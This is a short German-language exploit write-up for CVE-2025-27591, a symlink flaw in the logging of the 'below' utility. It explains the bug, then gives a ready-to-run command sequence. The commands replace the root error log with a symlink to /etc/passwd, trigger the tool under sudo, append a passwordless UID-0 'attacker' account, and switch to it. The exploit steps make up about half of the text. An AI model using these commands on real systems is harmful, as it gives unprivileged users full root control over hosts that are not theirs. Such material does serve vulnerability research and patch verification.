
Lokaler Privilege-Escalation-Exploit für CVE-2025-27591, der unsichere Symlink-Behandlung im Logging des unten genannten Dienstprogramms ausnutzt, um beliebige Dateien als root zu überschreiben.
CVE-2025-27591 ist eine lokale Privilege-Escalation-Schwachstelle im below-Dienstprogramm (Versionen vor dem gepatchten Release), die durch unsichere symbolische Link-Behandlung innerhalb seines Logging-Mechanismus verursacht wird. Angreifer mit lokalem Zugriff können diesen Fehler ausnutzen, um beliebige Dateien als Root-Benutzer zu überschreiben, was zu einer vollständigen Privilege-Escalation führt.
Das below-Tool schreibt Logs nach /var/log/below/, ohne symbolische Links ordnungsgemäß zu validieren. Durch das vorab Erstellen eines Symlinks, der auf eine sensible Datei (z. B. /etc/passwd) zeigt, kann ein Angreifer beliebigen Inhalt mit erhöhten Rechten einschleusen, wenn der anfällige Prozess unter sudo ausgeführt wird.
# Prüfen, ob das Log-Verzeichnis existiert
test -d /var/log/below && ls -ld /var/log/below
# Vorhandene Log-Datei entfernen und einen bösartigen Symlink erstellen
rm -f /var/log/below/error_root.log
ln -s /etc/passwd /var/log/below/error_root.log
# Bösartigen passwd-Eintrag vorbereiten
echo 'attacker::0:0:attacker:/root:/bin/bash' > /tmp/attacker
# Anfälliges Verhalten mit sudo auslösen
sudo /usr/bin/below record
echo 'attacker::0:0:attacker:/root:/bin/bash' >> /var/log/below/error_root.log
# Zum neu erstellten Benutzer mit Root-Rechten wechseln
su attacker
Eine erfolgreiche Ausnutzung gewährt einem lokalen, nicht privilegierten Angreifer Root-Rechte und ermöglicht so eine vollständige Kompromittierung des Systems.
/var/log/below/.